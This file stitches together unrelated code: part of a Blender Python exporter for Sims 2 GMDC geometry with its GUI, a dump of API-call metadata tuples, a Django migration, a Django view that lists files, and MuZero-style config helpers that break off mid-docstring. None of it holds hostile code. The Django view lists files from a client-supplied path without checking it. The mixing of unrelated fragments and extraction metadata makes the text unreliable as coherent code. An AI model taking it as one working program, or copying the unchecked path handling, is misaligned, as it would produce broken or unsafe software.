k = group.count
indices = map(lambda x: x + k, indices) # shift indices
log('--Extending group # %i...' % ref_group)
else:
ref_group = len(DATA_GROUPS)
group = DataGroup();
DATA_GROUPS.append(group)
log('--Adding new group # %i...' % ref_group)
# add vertices to group
#
group.vertices.extend(V)
group.normals.extend(N)
group.tex_coords.extend(T)
if rigging:
group.bones.extend(B)
group.weights.extend(W)
if settings['export_tangents']:
group.tangents.extend(X)
if morphing:
group.keys.extend(K)
dV = map(list, zip(*dV)) + [[], [], []]
for v, w in zip(group.dVerts, dV): v.extend(w)
if morphing > 1:
dN = map(list, zip(*dN)) + [[], [], []]
                for v, w in zip(group.dNorms, dN): v.extend(w)
del V, N, T, B, W, X, K, dV, dN
k = group.count
group.count = len(group.vertices)
log('\x20\x20--Vertex count:', '%i -> %i' % (k, group.count) if k else group.count)
#
# create index group
#
# name
name = obj.name
if settings['use_obj_props']:
try:
x = obj.getProperty('name')
assert x.type == 'STRING' and x.data != ''
except AssertionError:
log('Warning! Invalid data for property "name". Ignored.')
except:
pass
else:
name = x.data
log('--Creating new index group # %i, "%s" (triangles: %i)...' % (len(INDEX_GROUPS), name, len(indices) / 3))
group = IndexGroup(name);
INDEX_GROUPS.append(group)
group.data_group_index = ref_group
group.indices = chunk(tuple(indices), 3) # triangles
indices = None
# flags
if settings['use_obj_props']:
x = None
try:
x = obj.getProperty('flags')
try:
assert x.type == 'STRING'
x = int(x.data, 16)
log('--Flags:', to_hex(pack('<L', x)))
except:
x = None
log('Warning! Invalid data for property "flags". Ignored.')
else:
group.flags = x
except:
# property not found
pass
# bone index mapping
if rigging:
# order items by local bone index
bone_indices = sorted(bone_indices.iteritems(), None, key=lambda x: x[1])
# put global indices
group.bones = []
for idx, j in bone_indices:
if idx >= len(inverse_transforms):
error('Error! No inverse transform for bone # %i.' % idx)
return False
group.bones.append(idx)
bone_indices = None
# <- objects
#
# bounding geometry
#
static_bmesh = None;
dynamic_bmesh = None
if settings['export_bmesh']:
bmesh_obj = bpy.app.Object.Get(settings['bmesh_name'])
mesh = bmesh_obj.getData(mesh=True)
obj_loc = bmesh_obj.matrix[3].xyz
log('Bounding mesh object %s:' % bmesh_obj)
if settings['export_rigging']:
dynamic_bmesh = []
v_groups = {} # { bone_index -> v_group_name }
for name in mesh.getVertGroupNames():
# get bone index
s = name.split('#')
try:
idx = int(s[-1])
if len(s) < 2 or idx < 0: raise Exception()
except:
error('Error! Could not extract bone index from vertex group name "%s".' % name)
return False
v_groups[idx] = name
for idx in range(max(v_groups) + 1):
if idx in v_groups:
indices = set(v[0] for v in mesh.getVertsFromGroup(v_groups[idx], 1) if
v[1] > 0.0) # do not accept vertices with weight == 0
I = [];
dd = {}
for face in mesh.faces:
vi = [v.index for v in face.verts]
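                        # bit i is set when vertex i of the face belongs to this bone's group;
                        # 0b0111 covers triangle (0,1,2), 0b1101 covers (0,2,3)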
flags = sum(2 ** i for i, j in enumerate(vi) if j in indices)
if (flags & 0b0111) == 0b0111: # (0, 1, 2)
I.extend([
dd.setdefault(vi[0], len(dd)),
dd.setdefault(vi[1], len(dd)),
dd.setdefault(vi[2], len(dd))])
if (flags & 0b1101) == 0b1101: # (0, 2, 3)
I.extend([
dd.setdefault(vi[0], len(dd)),
dd.setdefault(vi[2], len(dd)),
dd.setdefault(vi[3], len(dd))])
if dd:
V = []
# get inverse transform
#
if idx >= len(inverse_transforms):
error('Error! No inverse transform for bone # %i.' % idx)
return False
rot, loc = inverse_transforms[idx]
t = Transform(loc, rot)
dd = sorted(dd.iteritems(), None, key=lambda x: x[1])
# set coords
for i, j in dd:
# transform coord into bone space
a = mesh.verts[i].co.xyz + obj_loc
a = t.transformPoint(Vector(a.x, a.y, a.z)).to_tuple()
V.append(a)
I = chunk(I, 3)
dynamic_bmesh.append((V, I))
log('--Part # %02i -> vertices: %i, triangles: %i' % (idx, len(V), len(I)))
else:
dynamic_bmesh.append(None)
else:
dynamic_bmesh.append(None)
if not any(dynamic_bmesh):
dynamic_bmesh = None
else:
V = [tuple((v.co + obj_loc).xyz) for v in mesh.verts]
I = []
for face in mesh.faces:
if len(face.verts) == 3:
I.append(tuple(v.index for v in face.verts))
else:
I.append((face.verts[0].index, face.verts[1].index, face.verts[2].index))
I.append((face.verts[0].index, face.verts[2].index, face.verts[3].index))
static_bmesh = (V, I)
log('--Static bounding mesh -> vertices: %i, triangles: %i' % (len(V), len(I)))
return GeometryData(DATA_GROUPS, INDEX_GROUPS, inverse_transforms, MORPH_NAMES, static_bmesh, dynamic_bmesh)
# -------------------------------------------------------------------------------
# this function does basic checks and initiates the exporter
def begin_export():
bpy.app.Window.EditMode(0)
settings = {
'SGResource': str_resource_name.val.strip(),
'name_suffix': btn_name_suffix.val,
'export_rigging': btn_export_rigging.val,
'export_tangents': btn_export_tangents.val,
'export_bmesh': btn_export_bmesh.val,
'bmesh_name': str_bmesh_name.val.strip(),
'export_morphs': menu_export_morphs.val,
'use_obj_props': btn_use_obj_props.val,
}
_save_log = bool(btn_save_log.val)
gmdc_filename = str_gmdc_filename.val.strip()
if not gmdc_filename:
display_menu('Error!', ['Select filename for GMDC file.']);
return
elif not os.path.basename(gmdc_filename):
display_menu('Error!', ['Invalid filename for GMDC file.']);
return
elif os.path.isfile(gmdc_filename):
if display_menu("File '%s' exists. Rewrite?" % os.path.basename(gmdc_filename), ['Yes, rewrite.']) != 0: return
if settings['export_bmesh'] and not settings['bmesh_name']:
display_menu('Error!', ['Enter bounding mesh\'s object name.'])
return
# create log file (if needed)
if _save_log:
s = gmdc_filename + '.export_log.txt'
log('Opening log file "%s" for writing... ' % s)
try:
f = open(s, 'w')
except IOError as e:
error(e)
display_menu('Error!', ['Could not open log file for writing.'])
return
# Ok
set_log_file(f)
#
# begin export
#
log('==Geometry Data Container Exporter======')
log('GMDC File:', gmdc_filename)
log('Settings:')
log('--SGResource:', settings['SGResource'] and '"%s"' % settings['SGResource'] or 'none')
log('--Name suffix: ', settings['name_suffix'])
log('--Export rigging: ', settings['export_rigging'])
log('--Export tangents: ', settings['export_tangents'])
log('--Export bounding geometry:', settings['export_bmesh'])
log('--Bounding mesh name:', settings['bmesh_name'] and '"%s"' % settings['bmesh_name'] or 'none')
log('--Export morphs: ', settings['export_morphs'])
log('--Use properties: ', settings['use_obj_props'])
log()
s = settings['SGResource']
if not s:
s = os.path.basename(gmdc_filename).split(".")
s = ".".join(s[:-1] or s)
if settings['name_suffix']:
s += '_tslocator_gmdc'
log('Preparing geometry...')
geometry = None
try:
geometry = prepare_geometry(settings)
except:
print_last_exception()
if not geometry:
        display_menu('Error!', ['An error has occurred while preparing geometry. See log for details.'])
close_log_file()
return
log()
log('Creating GMDC file "%s"... ' % gmdc_filename)
try:
create_gmdc_file(gmdc_filename, s, geometry)
except:
print_last_exception()
        display_menu('Error!', ['An error has occurred while creating GMDC file. See log for details.'])
else:
# Ok
log('Finished!')
# exit prompt
if display_menu("Export complete!", ['Quit']) == 0: bpy.app.Exit()
finally:
close_log_file()
########################################
# GUI
########################################
def display_menu(caption, items, choice_required=False):
b = True
while b:
choice = bpy.app.PupMenu('%s%%t|' % caption + "|".join('%s%%x%i' % (s, i) for i, s in enumerate(items)), 0x100)
b = choice_required and choice < 0
return choice
def draw_gui():
global str_gmdc_filename, str_cres_filename, str_resource_name, btn_name_suffix, \
btn_export_tangents, btn_export_rigging, btn_export_bmesh, btn_save_log, \
menu_export_morphs, btn_use_obj_props, str_bmesh_name
pos_y = 340;
MAX_PATH = 200
# frame
Blender.BGL.glColor3f(0.75, 0.75, 0.75)
Blender.BGL.glRecti(10, 10, 430, pos_y)
pos_y -= 30
# plugin's header
s = "GMDC Exporter (TS2)"
Blender.BGL.glColor3f(0.8, 0.8, 0.8)
Blender.BGL.glRecti(10, pos_y, 430, pos_y + 30)
bpy.app.Label(s, 20, pos_y, 400, 30)
pos_y -= 30
# GMDC file selector
bpy.app.Label("GMDC file (output)", 20, pos_y, 200, 20)
pos_y -= 20
bpy.app.BeginAlign()
str_gmdc_filename = bpy.app.String("", 0x10, 20, pos_y, 300, 20, str_gmdc_filename.val, MAX_PATH, "Path to GMDC file")
bpy.app.PushButton("Select file", 0x11, 320, pos_y, 100, 20, "Open file browser")
bpy.app.EndAlign()
pos_y -= 35
# geometry name
Blender.BGL.glColor3f(0.7, 0.7, 0.7)
Blender.BGL.glRecti(20, pos_y - 60, 420, pos_y + 20)
bpy.app.Label("SGResource name (optional)", 25, pos_y, 400, 20);
pos_y -= 20
bpy.app.Label("If not provided then GMDC filename is used", 25, pos_y, 400, 20);
pos_y -= 30
bpy.app.BeginAlign()
str_resource_name = bpy.app.String("", 0x50, 70, pos_y, 180, 20, str_resource_name.val, 50,
"SGResource name of this geometry")
btn_name_suffix = bpy.app.Toggle("_tslocator_gmdc", 0x51, 250, pos_y, 120, 20, btn_name_suffix.val,
"Add default suffix")
bpy.app.EndAlign()
pos_y -= 45
# options
bpy.app.BeginAlign()
btn_export_rigging = bpy.app.Toggle("Rigging", 0x31, 20, pos_y, 100, 20, btn_export_rigging.val,
"Export rigging data (bone indices, weights)")
btn_export_tangents = bpy.app.Toggle("Tangents", 0x32, 120, pos_y, 100, 20, btn_export_tangents.val,
"Export tangents (required for bump mapping)")
btn_export_bmesh = bpy.app.Toggle("Bound. mesh", 0x33, 220, pos_y, 100, 20, btn_export_bmesh.val,
"Export bounding geometry")
btn_save_log = bpy.app.Toggle("Save log", 0x34, 320, pos_y, 100, 20, btn_save_log.val,
"Write script's log data into file *.export_log.txt")
bpy.app.EndAlign()
pos_y -= 30
bpy.app.BeginAlign()
menu_export_morphs = bpy.app.Menu(
"Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. in v.coords and normals %x2", 0x35,
20, pos_y, 200, 20, menu_export_morphs.val)
btn_use_obj_props = bpy.app.Toggle("Use object properties", 0x36, 220, pos_y, 200, 20, btn_use_obj_props.val,
"Properties can be assigned in logic panel")
bpy.app.EndAlign()
pos_y -= 30
# bounding mesh name
bpy.app.Label("Bounding mesh:", 20, pos_y, 100, 20)
str_bmesh_name = bpy.app.String("", 0x40, 120, pos_y, 200, 20, str_bmesh_name.val, 50,
"Name of mesh object that will be exported as bounding mesh")
pos_y -= 50
# buttons
bpy.app.BeginAlign()
bpy.app.PushButton("Export", 1, 120, pos_y, 100, 30, "Export geometry (Ctrl + Enter)")
bpy.app.PushButton("Exit", 0, 220, pos_y, 100, 30, "Terminate the script (Esc)")
bpy.app.EndAlign()
# ---------------------------------------
# event handlers
l_ctrl_key_pressed = 0
r_ctrl_key_pressed = 0
def set_gmdc_filename(filename):
global gmdc_filename
str_gmdc_filename.val = filename
def event_handler(evt, val):
global l_ctrl_key_pressed, r_ctrl_key_pressed
if evt == bpy.app.ESCKEY and val:
bpy.app.Exit()
elif evt == bpy.app.LEFTCTRLKEY:
l_ctrl_key_pressed = val
elif evt == bpy.app.RIGHTCTRLKEY:
r_ctrl_key_pressed = val
elif evt == bpy.app.RETKEY and val and (l_ctrl_key_pressed or r_ctrl_key_pressed):
begin_export()
l_ctrl_key_pressed = 0
r_ctrl_key_pressed = 0
def button_events(evt):
if evt == 0:
bpy.app.Exit()
elif evt == 1:
begin_export()
elif evt == 0x11:
bpy.app.Window.FileSelector(set_gmdc_filename, 'Select', bpy.sys.makename(ext='.gmdc'))
# -------------------------------------------------------------------------------
# set default values for GUI elements and run event loop
str_gmdc_filename = bpy.app.Create("")
str_resource_name = bpy.app.Create("")
btn_name_suffix = bpy.app.Create(1)
btn_export_rigging = bpy.app.Create(0)
btn_export_tangents = bpy.app.Create(0)
btn_export_bmesh = bpy.app.Create(0)
btn_save_log = bpy.app.Create(0)
btn_use_obj_props = bpy.app.Create(0)
menu_export_morphs = bpy.app.Create(0)
str_bmesh_name = bpy.app.Create("b_mesh")
bpy.app.Register(draw_gui, event_handler, button_events)
|
[
"bpy.app.Menu",
"os.path.isfile",
"bpy.app.Register",
"bpy.app.BeginAlign",
"bpy.app.Label",
"bpy.app.EndAlign",
"struct.pack",
"bpy.app.Window.EditMode",
"bpy.app.Exit",
"os.path.basename",
"bpy.app.Create",
"itertools.count",
"bpy.app.Toggle",
"itertools.repeat",
"bpy.sys.makename",
"mathutils.Vector",
"bpy.app.String",
"bpy.app.Object.Get",
"bpy.app.PushButton"
] |
[((29053, 29071), 'bpy.app.Create', 'bpy.app.Create', (['""""""'], {}), "('')\n", (29067, 29071), False, 'import bpy\n'), ((29092, 29110), 'bpy.app.Create', 'bpy.app.Create', (['""""""'], {}), "('')\n", (29106, 29110), False, 'import bpy\n'), ((29129, 29146), 'bpy.app.Create', 'bpy.app.Create', (['(1)'], {}), '(1)\n', (29143, 29146), False, 'import bpy\n'), ((29168, 29185), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29182, 29185), False, 'import bpy\n'), ((29208, 29225), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29222, 29225), False, 'import bpy\n'), ((29245, 29262), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29259, 29262), False, 'import bpy\n'), ((29278, 29295), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29292, 29295), False, 'import bpy\n'), ((29316, 29333), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29330, 29333), False, 'import bpy\n'), ((29355, 29372), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29369, 29372), False, 'import bpy\n'), ((29390, 29414), 'bpy.app.Create', 'bpy.app.Create', (['"""b_mesh"""'], {}), "('b_mesh')\n", (29404, 29414), False, 'import bpy\n'), ((29416, 29472), 'bpy.app.Register', 'bpy.app.Register', (['draw_gui', 'event_handler', 'button_events'], {}), '(draw_gui, event_handler, button_events)\n', (29432, 29472), False, 'import bpy\n'), ((21012, 21038), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (21035, 21038), False, 'import bpy\n'), ((25079, 25115), 'bpy.app.Label', 'bpy.app.Label', (['s', '(20)', 'pos_y', '(400)', '(30)'], {}), '(s, 20, pos_y, 400, 30)\n', (25092, 25115), False, 'import bpy\n'), ((25164, 25219), 'bpy.app.Label', 'bpy.app.Label', (['"""GMDC file (output)"""', '(20)', 'pos_y', '(200)', '(20)'], {}), "('GMDC file (output)', 20, pos_y, 200, 20)\n", (25177, 25219), False, 'import bpy\n'), ((25240, 25260), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (25258, 25260), False, 'import bpy\n'), ((25285, 25385), 'bpy.app.String', 'bpy.app.String', (['""""""', '(16)', '(20)', 'pos_y', '(300)', '(20)', 'str_gmdc_filename.val', 'MAX_PATH', '"""Path to GMDC file"""'], {}), "('', 16, 20, pos_y, 300, 20, str_gmdc_filename.val, MAX_PATH,\n 'Path to GMDC file')\n", (25299, 25385), False, 'import bpy\n'), ((25388, 25467), 'bpy.app.PushButton', 'bpy.app.PushButton', (['"""Select file"""', '(17)', '(320)', 'pos_y', '(100)', '(20)', '"""Open file browser"""'], {}), "('Select file', 17, 320, pos_y, 100, 20, 'Open file browser')\n", (25406, 25467), False, 'import bpy\n'), ((25474, 25492), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (25490, 25492), False, 'import bpy\n'), ((25635, 25698), 'bpy.app.Label', 'bpy.app.Label', (['"""SGResource name (optional)"""', '(25)', 'pos_y', '(400)', '(20)'], {}), "('SGResource name (optional)', 25, pos_y, 400, 20)\n", (25648, 25698), False, 'import bpy\n'), ((25720, 25799), 'bpy.app.Label', 'bpy.app.Label', (['"""If not provided then GMDC filename is used"""', '(25)', 'pos_y', '(400)', '(20)'], {}), "('If not provided then GMDC filename is used', 25, pos_y, 400, 20)\n", (25733, 25799), False, 'import bpy\n'), ((25821, 25841), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (25839, 25841), False, 'import bpy\n'), ((25866, 25975), 'bpy.app.String', 'bpy.app.String', (['""""""', '(80)', '(70)', 'pos_y', '(180)', '(20)', 'str_resource_name.val', '(50)', '"""SGResource name of this geometry"""'], {}), "('', 80, 70, pos_y, 180, 20, str_resource_name.val, 
50,\n 'SGResource name of this geometry')\n", (25880, 25975), False, 'import bpy\n'), ((26032, 26138), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""_tslocator_gmdc"""', '(81)', '(250)', 'pos_y', '(120)', '(20)', 'btn_name_suffix.val', '"""Add default suffix"""'], {}), "('_tslocator_gmdc', 81, 250, pos_y, 120, 20, btn_name_suffix.\n val, 'Add default suffix')\n", (26046, 26138), False, 'import bpy\n'), ((26174, 26192), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (26190, 26192), False, 'import bpy\n'), ((26230, 26250), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (26248, 26250), False, 'import bpy\n'), ((26276, 26400), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Rigging"""', '(49)', '(20)', 'pos_y', '(100)', '(20)', 'btn_export_rigging.val', '"""Export rigging data (bone indices, weights)"""'], {}), "('Rigging', 49, 20, pos_y, 100, 20, btn_export_rigging.val,\n 'Export rigging data (bone indices, weights)')\n", (26290, 26400), False, 'import bpy\n'), ((26462, 26589), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Tangents"""', '(50)', '(120)', 'pos_y', '(100)', '(20)', 'btn_export_tangents.val', '"""Export tangents (required for bump mapping)"""'], {}), "('Tangents', 50, 120, pos_y, 100, 20, btn_export_tangents.val,\n 'Export tangents (required for bump mapping)')\n", (26476, 26589), False, 'import bpy\n'), ((26649, 26757), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Bound. mesh"""', '(51)', '(220)', 'pos_y', '(100)', '(20)', 'btn_export_bmesh.val', '"""Export bounding geometry"""'], {}), "('Bound. mesh', 51, 220, pos_y, 100, 20, btn_export_bmesh.val,\n 'Export bounding geometry')\n", (26663, 26757), False, 'import bpy\n'), ((26810, 26937), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Save log"""', '(52)', '(320)', 'pos_y', '(100)', '(20)', 'btn_save_log.val', '"""Write script\'s log data into file *.export_log.txt"""'], {}), '(\'Save log\', 52, 320, pos_y, 100, 20, btn_save_log.val,\n "Write script\'s log data into file *.export_log.txt")\n', (26824, 26937), False, 'import bpy\n'), ((26971, 26989), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (26987, 26989), False, 'import bpy\n'), ((27012, 27032), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (27030, 27032), False, 'import bpy\n'), ((27058, 27234), 'bpy.app.Menu', 'bpy.app.Menu', (['"""Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. in v.coords and normals %x2"""', '(53)', '(20)', 'pos_y', '(200)', '(20)', 'menu_export_morphs.val'], {}), "(\n 'Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. 
in v.coords and normals %x2'\n , 53, 20, pos_y, 200, 20, menu_export_morphs.val)\n", (27070, 27234), False, 'import bpy\n'), ((27268, 27404), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Use object properties"""', '(54)', '(220)', 'pos_y', '(200)', '(20)', 'btn_use_obj_props.val', '"""Properties can be assigned in logic panel"""'], {}), "('Use object properties', 54, 220, pos_y, 200, 20,\n btn_use_obj_props.val, 'Properties can be assigned in logic panel')\n", (27282, 27404), False, 'import bpy\n'), ((27443, 27461), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (27459, 27461), False, 'import bpy\n'), ((27510, 27561), 'bpy.app.Label', 'bpy.app.Label', (['"""Bounding mesh:"""', '(20)', 'pos_y', '(100)', '(20)'], {}), "('Bounding mesh:', 20, pos_y, 100, 20)\n", (27523, 27561), False, 'import bpy\n'), ((27583, 27716), 'bpy.app.String', 'bpy.app.String', (['""""""', '(64)', '(120)', 'pos_y', '(200)', '(20)', 'str_bmesh_name.val', '(50)', '"""Name of mesh object that will be exported as bounding mesh"""'], {}), "('', 64, 120, pos_y, 200, 20, str_bmesh_name.val, 50,\n 'Name of mesh object that will be exported as bounding mesh')\n", (27597, 27716), False, 'import bpy\n'), ((27785, 27805), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (27803, 27805), False, 'import bpy\n'), ((27810, 27900), 'bpy.app.PushButton', 'bpy.app.PushButton', (['"""Export"""', '(1)', '(120)', 'pos_y', '(100)', '(30)', '"""Export geometry (Ctrl + Enter)"""'], {}), "('Export', 1, 120, pos_y, 100, 30,\n 'Export geometry (Ctrl + Enter)')\n", (27828, 27900), False, 'import bpy\n'), ((27901, 27986), 'bpy.app.PushButton', 'bpy.app.PushButton', (['"""Exit"""', '(0)', '(220)', 'pos_y', '(100)', '(30)', '"""Terminate the script (Esc)"""'], {}), "('Exit', 0, 220, pos_y, 100, 30, 'Terminate the script (Esc)'\n )\n", (27919, 27986), False, 'import bpy\n'), ((27986, 28004), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (28002, 28004), False, 'import bpy\n'), ((3560, 3586), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(1)'], {}), '(1)\n', (3583, 3586), False, 'import bpy\n'), ((3595, 3621), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (3618, 3621), False, 'import bpy\n'), ((17037, 17079), 'bpy.app.Object.Get', 'bpy.app.Object.Get', (["settings['bmesh_name']"], {}), "(settings['bmesh_name'])\n", (17055, 17079), False, 'import bpy\n'), ((28337, 28351), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (28349, 28351), False, 'import bpy\n'), ((28716, 28730), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (28728, 28730), False, 'import bpy\n'), ((4416, 4448), 'itertools.repeat', 'repeat', (['(None, None, None, None)'], {}), '((None, None, None, None))\n', (4422, 4448), False, 'from itertools import count, repeat\n'), ((21669, 21700), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21685, 21700), False, 'import os\n'), ((21795, 21824), 'os.path.isfile', 'os.path.isfile', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21809, 21824), False, 'import os\n'), ((24112, 24126), 'bpy.app.Exit', 'bpy.app.Exit', ([], {}), '()\n', (24124, 24126), False, 'import bpy\n'), ((8612, 8638), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(1)'], {}), '(1)\n', (8635, 8638), False, 'import bpy\n'), ((8655, 8681), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (8678, 8681), False, 'import bpy\n'), ((23249, 23280), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', 
(23265, 23280), False, 'import os\n'), ((28860, 28889), 'bpy.sys.makename', 'bpy.sys.makename', ([], {'ext': '""".gmdc"""'}), "(ext='.gmdc')\n", (28876, 28889), False, 'import bpy\n'), ((12227, 12234), 'itertools.count', 'count', ([], {}), '()\n', (12232, 12234), False, 'from itertools import count, repeat\n'), ((12376, 12383), 'itertools.count', 'count', ([], {}), '()\n', (12381, 12383), False, 'from itertools import count, repeat\n'), ((16076, 16089), 'struct.pack', 'pack', (['"""<L"""', 'x'], {}), "('<L', x)\n", (16080, 16089), False, 'from struct import pack\n'), ((21881, 21912), 'os.path.basename', 'os.path.basename', (['gmdc_filename'], {}), '(gmdc_filename)\n', (21897, 21912), False, 'import os\n'), ((9524, 9557), 'mathutils.Vector', 'BlenderVector', (['all_vertices[j][0]'], {}), '(all_vertices[j][0])\n', (9537, 9557), True, 'from mathutils import Vector as BlenderVector\n'), ((9610, 9643), 'mathutils.Vector', 'BlenderVector', (['all_vertices[j][1]'], {}), '(all_vertices[j][1])\n', (9623, 9643), True, 'from mathutils import Vector as BlenderVector\n')]
|
# Generated by Django 2.0.1 on 2018-01-12 12:04
from django.db import migrations, models
def populate_function_allowed(apps, schema_editor):
Classification = apps.get_model('metarecord', 'Classification')
for classification in Classification.objects.all():
classification.function_allowed = not classification.children.exists()
classification.save(update_fields=('function_allowed',))
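# Illustrative sketch (hypothetical helper, not used by this migration): an
# explicit reverse for RunPython, had migrations.RunPython.noop below not been
# sufficient. It simply resets the derived flag.
def reverse_function_allowed(apps, schema_editor):
    Classification = apps.get_model('metarecord', 'Classification')
    Classification.objects.update(function_allowed=False)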
class Migration(migrations.Migration):
dependencies = [
('metarecord', '0035_add_on_deletes'),
]
operations = [
migrations.AddField(
model_name='classification',
name='function_allowed',
field=models.BooleanField(default=False, verbose_name='function allowed'),
),
migrations.RunPython(populate_function_allowed, migrations.RunPython.noop)
]
|
[
"django.db.migrations.RunPython",
"django.db.models.BooleanField"
] |
[((762, 836), 'django.db.migrations.RunPython', 'migrations.RunPython', (['populate_function_allowed', 'migrations.RunPython.noop'], {}), '(populate_function_allowed, migrations.RunPython.noop)\n', (782, 836), False, 'from django.db import migrations, models\n'), ((674, 741), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""function allowed"""'}), "(default=False, verbose_name='function allowed')\n", (693, 741), False, 'from django.db import migrations, models\n')]
|
from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
src = request.POST.get('src', '')
print(src)
files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method: PositionMethod) -> Set[str]:
return available_images(method)
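# Minimal usage sketch (hypothetical route and path, not part of the original
# module): exercising the endpoint with Django's test client, assuming it is
# routed at '/video_images/'.
def _example_video_images_request():
    from django.test import Client
    # POST a source image path; the view answers with its sibling files as JSON
    return Client().post('/video_images/', {'src': '/media/frames/0001.jpg'})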
|
[
"diplomova_praca_lib.position_similarity.position_similarity_request.available_images",
"django.http.JsonResponse",
"pathlib.Path"
] |
[((555, 597), 'django.http.JsonResponse', 'JsonResponse', (["{'files': files}"], {'status': '(200)'}), "({'files': files}, status=200)\n", (567, 597), False, 'from django.http import JsonResponse\n'), ((692, 716), 'diplomova_praca_lib.position_similarity.position_similarity_request.available_images', 'available_images', (['method'], {}), '(method)\n', (708, 716), False, 'from diplomova_praca_lib.position_similarity.position_similarity_request import available_images\n'), ((520, 533), 'pathlib.Path', 'Path', (['src[1:]'], {}), '(src[1:])\n', (524, 533), False, 'from pathlib import Path\n')]
|
def dir_name(config, method):
if config.game.kind == "Breakthrough":
return "{}-breakthrough-{}".format(method, config.game.size)
elif config.game.kind == "Gym":
return "{}-gym-{}".format(method, config.game.name)
else:
print("Unknown game in config file.")
exit(-1)
def get_board_shape(config):
if config.game.kind == "Breakthrough":
return (config.game.history, config.game.size, config.game.size, 3)
elif config.game.kind == "Gym":
if config.game.name == "Breakout-v0":
return (config.game.history, 96, 96, 3)
else:
print("Gym not implemented for this game.")
exit(-1)
else:
print("Unknown game in config file.")
exit(-1)
def get_action_shape(config):
if config.game.kind == "Breakthrough":
return (config.game.size, config.game.size, 3)
elif config.game.kind == "Gym":
if config.game.name == "Breakout-v0":
return (4,)
else:
print("Gym not implemented for this game.")
exit(-1)
else:
print("Unknown game in config file.")
exit(-1)
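# Illustrative (hypothetical config stand-in mirroring the attributes read
# above):
#   class _Game: kind = "Breakthrough"; size = 5; history = 2
#   class _Config: game = _Game()
#   dir_name(_Config(), "mu")     # -> 'mu-breakthrough-5'
#   get_board_shape(_Config())    # -> (2, 5, 5, 3)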
import numpy as np
# scalar to categorical transformation.
def value_to_support(v, support_size):
# invertible transformation
    scaled = np.sign(v) * (np.sqrt(np.abs(v) + 1) - 1) + 0.001 * v
# clamp to support
clamped = np.clip(scaled, -support_size, support_size)
v1 = np.floor(clamped)
p1 = 1 - (clamped - v1)
v2 = v1 + 1
p2 = 1 - p1
result = np.zeros(shape=(support_size*2+1,))
result[int(v1) + support_size] = p1
if int(v2) + support_size < support_size*2+1:
result[int(v2) + support_size] = p2
return result
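# Illustrative inverse (the name support_to_value is ours, not from the
# original code): recover a scalar from a support distribution by taking the
# expectation over the bins, then applying the closed-form inverse of
# h(x) = sign(x) * (sqrt(|x| + 1) - 1) + 0.001 * x.
def support_to_value(probs, support_size):
    support = np.arange(-support_size, support_size + 1)
    x = float(np.sum(probs * support))
    eps = 0.001
    return np.sign(x) * (
        ((np.sqrt(1.0 + 4.0 * eps * (np.abs(x) + 1.0 + eps)) - 1.0) / (2.0 * eps)) ** 2 - 1.0)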
from tensorflow.keras import losses
def mu_loss_unrolled_cce(config):
def loss(y_true, y_pred):
policy_loss = 0.
for i in range(config.mu.unroll_steps):
policy_loss += losses.categorical_crossentropy(
y_true[:, i], y_pred[:, i]) / config.mu.unroll_steps
return policy_loss
return loss
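# Usage sketch (hypothetical `config` and Keras `model` objects): the factory
# returns a loss compatible with model.compile, averaging categorical
# cross-entropy over the unrolled policy heads.
#   model.compile(optimizer="adam", loss=mu_loss_unrolled_cce(config))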
def get_support_shape(x):
return (x or 0)*2+1
"""
## GAME SETTINGS, make sure this is coherent with the generator and evaluator
GAME = "breakthrough"
if GAME == "breakthrough":
BT_K = 5
HISTORY_LENGTH = 2
BOARD_SHAPE = (HISTORY_LENGTH, BT_K, BT_K, 3)
ACTION_PLANES = 3
ACTION_SHAPE = (BT_K, BT_K, ACTION_PLANES)
